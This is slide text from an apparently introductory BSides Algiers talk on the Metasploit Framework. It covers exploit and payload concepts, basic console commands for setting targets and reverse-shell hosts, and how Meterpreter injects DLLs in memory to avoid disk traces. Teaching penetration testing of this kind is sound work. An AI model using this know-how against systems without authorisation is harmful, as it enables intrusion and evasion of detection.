bsides algiers - metasploit framework - oussama elhamer

The Metasploit Framework

By Elhamer Oussama Abdelkhalek

Contents :• Introduction :I. Basics .II. Running an attack The old fashioned way .III. Overview of the metasploit project and framework IV. Run the same attack using metasploit .• Metasploit overview and Basic framework usage . I. Metasploit Architechture .II. Consols .• MeterPreter basics and overView

Exploitation !• Vulnerability : a weakness which allow an attacker to braek

into a system security.• Exploit : code which allow attacker to take advantage of a

vulnerable system • Payload : A code that Run On the System After Exploitation

-Vunerability-Exploit-Payload

Attacker

1. Exploit Runs First 2. PayLoad Runs Next If Exploit Succeed

Data DownLooad Uploading Malwares …

Exploit + Payload

Vulnerable System

Run an Exploit The Old Fashion Way

.The Vulnerability : RPCDCOM The Buffer Overflow In Rcp Interface ;.The Exploit And The PayLoad are Availble ;

The Problem !• A Lot Of Exploits !• Hard To Cutomize The Payload .• Testing exploit Research is Painfull !.

• Metasploit is a Short Cut

What Is Metasploit ?• Metasploit has come to be synonymous with the Metasploit Framework.• The Metasploit Project Whose goal is to provide information that will

be useful in I. Pentration Testing.II. IDS Signature.I. exploit research.• Developped By H.D Moor 2003 then acquired by Rapid7 • Primarily written in perl, • Then Rewritten in Ruby ‘Largest proGramme Even Wrotte In Ruby’ !!• The framework is an open-source platform for developing, testing

and using exploit code. • The current “stable” version is version 4• Similar to the commercial projects Canvas (Immunity) and Impact

(Core)

Benefits • Over 600 tested exploits and 200 payloads !• Plug and play of payloads with exploits -matching the Payload whith The Exloit -Try different Payload with The Same Exploit Code . • Lot Of Tools and Features For better And Faster pentests

Using Metasploit • Show – list modules available (exploits, payloads, etc)• Use – Use a specific exploit module• Set – set specific variables (Case sensitive)

• RHOST – Remote Host (who we’re attacking)• PAYLOAD – The payload to carry• LHOST – Local Host (for the phone home attacks, reverse shell)

• Exploit – run the exploit.

• RpcDcom Using Metasploit.

Using Metasploit :

Metasploit Architecture:

MeterPreter • What We Are Looking For is a Payload which :• - Avoid Creation of a new Process .• - Should Run in The Exploited process’ Context.• - Should Not Created a new File On disk .• - Import More Functionality (extending ) and not Be Limited

Whith The Created Remote Shell Commande .

• - That Exactly What MeterPreter Do !

Meterpreter Basics

• Post exploitation Tool• Woks by using in memory DLL injection • Does Not Create any files on disk • Uses encrypted communication between Client and Attacker• Stable ,Flexible and Extensible !• Can be extended at runtime by shipping dlls To the Victime

How It Works • When The Exploit Succeed• Exploit and Run The First PayLoad • PayLoad Connectes Back To Msf • 2nd Stage Dll Injection Payload Sent • Msf Sends Merterpreter Server Dll• Client And Server Communication

Using Meterpreter • DEMO

Client Server Communication In Meterpreter• The Communication Is Encrypted .• In The Form of TlVs (Type Length Value).• So Multiple Channels Of communication can use the same

client –server connection .• Allow For multiple programs running on the victim to

communicate at the same Time .• Demo.